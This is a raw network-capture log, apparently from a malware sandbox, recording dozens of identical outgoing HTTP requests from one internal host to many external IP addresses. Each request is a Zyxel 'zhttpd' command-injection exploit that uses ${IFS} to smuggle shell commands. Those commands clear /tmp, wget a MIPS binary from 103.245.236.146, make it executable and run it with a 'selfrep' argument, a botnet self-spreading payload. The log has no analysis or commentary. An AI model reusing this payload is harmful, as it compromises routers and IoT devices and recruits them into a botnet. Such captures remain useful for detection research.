                                                        Jan 28, 2024 10:12:53.422076941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4570192.168.2.1457304121.199.204.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422110081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4571192.168.2.1458706186.57.30.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422152996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4572192.168.2.143406687.152.243.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422169924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4573192.168.2.1446364120.7.174.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422214985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4574192.168.2.1449810122.201.81.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422264099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4575192.168.2.1454242116.161.48.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422317982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4576192.168.2.1432878158.9.226.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422352076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4577192.168.2.1438320175.190.24.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422374010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4578192.168.2.1460518156.247.219.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422418118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4579192.168.2.1443164135.116.240.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422452927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4580192.168.2.143278218.4.187.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422488928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4581192.168.2.1455386185.18.205.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422532082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4582192.168.2.14562129.22.82.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422564983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4583192.168.2.1446860112.167.119.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422594070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4584192.168.2.1454744168.186.105.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422632933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4585192.168.2.1457246190.169.110.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422667027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4586192.168.2.144088294.143.51.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422727108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4587192.168.2.1449208152.98.183.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422744036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4588192.168.2.143295861.173.85.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422790051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4589192.168.2.1449016110.112.169.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422817945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4590192.168.2.143988044.147.132.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422863007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4591192.168.2.1450434190.188.209.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422894955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4592192.168.2.1441456169.238.98.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422944069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4593192.168.2.1452388190.243.71.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.422981977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4594192.168.2.1433184105.75.216.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423008919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4595192.168.2.143444063.38.192.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423058987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4596192.168.2.1444068205.85.227.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423103094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4597192.168.2.1459030135.8.39.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423149109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4598192.168.2.1441440138.78.205.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423180103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4599192.168.2.1456586165.130.198.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423223019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4600192.168.2.145964614.89.159.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423259020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4601192.168.2.143644890.179.121.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423285007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4602192.168.2.144377890.188.136.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423337936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4603192.168.2.1459160125.141.231.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423381090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4604192.168.2.144355659.62.27.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423405886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4605192.168.2.1443268191.201.112.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423461914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4606192.168.2.1432928220.252.44.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423525095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4607192.168.2.144008271.118.241.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423535109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4608192.168.2.145046896.118.144.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423578024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4609192.168.2.144857219.140.232.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423619032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4610192.168.2.144054653.47.56.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423655987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4611192.168.2.1446148170.16.233.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423698902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4612192.168.2.145915660.33.245.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423722982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4613192.168.2.145341253.93.24.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423753977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4614192.168.2.1456374203.217.1.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423791885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4615192.168.2.143328031.187.119.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423825979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4616192.168.2.14341524.182.83.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423877001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4617192.168.2.1443650140.99.162.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423907042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4618192.168.2.143849039.176.155.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423933029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4619192.168.2.1453184193.9.100.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.423989058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4620192.168.2.143928427.65.1.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424020052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4621192.168.2.145832468.61.3.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424060106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4622192.168.2.1451766115.70.32.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424097061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4623192.168.2.144621472.224.144.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424134016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4624192.168.2.145750424.0.208.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424161911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4625192.168.2.144114035.95.13.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424202919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4626192.168.2.1433396124.40.222.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424246073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4627192.168.2.1449158185.167.18.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424283028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4628192.168.2.1450556217.201.159.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424340963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4629192.168.2.145977473.0.74.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424364090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4630192.168.2.1443844100.135.232.0443
                                                        TimestampBytes transferredDirectionData
